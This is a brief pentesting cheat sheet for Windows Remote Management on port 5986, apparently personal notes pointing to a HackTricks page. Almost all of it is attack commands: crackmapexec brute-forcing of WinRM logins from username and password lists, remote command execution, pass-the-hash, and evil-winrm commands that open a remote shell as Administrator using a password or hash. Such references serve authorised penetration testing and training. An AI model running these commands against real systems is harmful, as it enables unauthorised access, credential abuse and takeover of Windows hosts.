5986 - Pentesting winrm
windows
brute force
brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
evil-winrm
with password
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i <IP>/<Domain>
evil-winrm -u <username> -H <Hash> -i <IP>
links
- https://book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm